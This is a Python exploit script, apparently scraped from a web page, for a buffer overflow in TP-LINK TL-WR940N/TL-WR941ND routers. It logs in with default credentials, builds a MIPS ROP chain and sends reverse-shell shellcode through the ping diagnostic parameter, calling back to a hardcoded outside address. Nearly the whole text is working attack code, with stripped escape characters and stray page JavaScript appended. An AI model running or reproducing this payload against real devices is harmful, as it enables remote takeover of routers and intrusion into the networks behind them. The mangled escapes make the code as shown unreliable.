TP-LINK TL-WR940N / TL-WR941ND Buffer Overflow
# TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit
import requests
import md5
import base64
import string
import struct
import socket
password = md5.new('admin').hexdigest()
cookie = base64.b64encode('admin:'+password)
print '[+] Authorization cookie: ', cookie
print '[+] Login to generate user directory...'
#proxy = {'http':'127.0.0.1:8080'}
loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
req = requests.get(loginUrl, headers=headers)
directory = ''
nop = "x27xE0xFFxFF"
shellcode = string.join([
"x24x0fxffxfa", # li t7,-6
"x01xe0x78x27", # nor t7,t7,zero
"x21xe4xffxfd", # addi a0,t7,-3
"x21xe5xffxfd", # addi a1,t7,-3
"x28x06xffxff", # slti a2,zero,-1
"x24x02x10x57", # li v0,4183
"x01x01x01x0c", # syscall 0x40404
"xafxa2xffxff", # sw v0,-1(sp)
"x8fxa4xffxff", # lw a0,-1(sp)
"x34x0fxffxfd", # li t7,0xfffd
"x01xe0x78x27", # nor t7,t7,zero
"xafxafxffxe0", # sw t7,-32(sp)
"x3cx0ex1fx90", # lui t6,0x1f90
"x35xcex1fx90", # ori t6,t6,0x1f90
"xafxaexffxe4", # sw t6,-28(sp)
# Big endian IP address 172.28.128.4
"x3cx0exc0xA8" # lui t6,0x7f01
#"xacx1cx80x04", # lui t6,0x7f01
"x35xcex01x64", # ori t6,t6,0x101
"xafxaexffxe6", # sw t6,-26(sp)
"x27xa5xffxe2", # addiu a1,sp,-30
"x24x0cxffxef", # li t4,-17
"x01x80x30x27", # nor a2,t4,zero
"x24x02x10x4a", # li v0,4170
"x01x01x01x0c", # syscall 0x40404
"x24x0fxffxfd", # li t7,-3
"x01xe0x78x27", # nor t7,t7,zero
"x8fxa4xffxff", # lw a0,-1(sp)
"x01xe0x28x21", # move a1,t7
"x24x02x0fxdf", # li v0,4063
"x01x01x01x0c", # syscall 0x40404
"x24x10xffxff", # li s0,-1
"x21xefxffxff", # addi t7,t7,-1
"x15xf0xffxfa", # bne t7,s0,68
"x28x06xffxff", # slti a2,zero,-1
"x3cx0fx2fx2f", # lui t7,0x2f2f
"x35xefx62x69", # ori t7,t7,0x6269
"xafxafxffxec", # sw t7,-20(sp)
"x3cx0ex6ex2f", # lui t6,0x6e2f
"x35xcex73x68", # ori t6,t6,0x7368
"xafxaexffxf0", # sw t6,-16(sp)
"xafxa0xffxf4", # sw zero,-12(sp)
"x27xa4xffxec", # addiu a0,sp,-20
"xafxa4xffxf8", # sw a0,-8(sp)
"xafxa0xffxfc", # sw zero,-4(sp)
"x27xa5xffxf8", # addiu a1,sp,-8
"x24x02x0fxab", # li v0,4011
"x01x01x01x0c" # syscall 0x40404
], '')
libcBase= 0x77f53000
sleep = libcBase + 0x53CA0
gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9;
gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9;
print "[+] First gadget address: ", hex(gadget1)
print "[+] Second gadget address: ", hex(gadget2)
print "[+] Third gadget address: ", hex(gadget3)
print "[+] Fourth gadget address: ", hex(gadget4)
print "[+] Fifth gadget address: ", hex(gadget4)
print "[+] Sleep function address: ", hex(sleep)
payload = "A"*160
s0 = "BBBB"
s1 = gadget2
payload += s0
payload += struct.pack('>I', s1)
payload += struct.pack('>I', gadget1) #Overwrite RA address
#New stack for gadget 2 starts
payload += "E" * 20 # adjust stack
payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
payload += "AAAA"
payload += "CCCC"
payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
#New stack for gadget 3 starts
payload += "G" *24
payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 < = load gadget 5 addr
payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra < = load gadget 4 addr
#New stack for gadget 4 starts
payload += nop * 32
payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0
if(req.status_code):
directory = req.text.split('=')[2].split('/')[3]
print '[+] Retrieved folder name: ', directory
req.close()
referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)
host = '192.168.0.1'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, sending payload {0} bytes...".format(len(payload))
pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
pingReq = "GET /{0} HTTP/1.1rnHost: {1}rnReferer: {2}rncookie: {3}rnrn".format(pingUrl, host, referer, auth)
print "[+] Exploit request: {0}".format(pingReq)
s.send(pingReq)
s.recv(4096)
s.close()
else:
req.close()
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "http://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=409115965821184";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
Gloss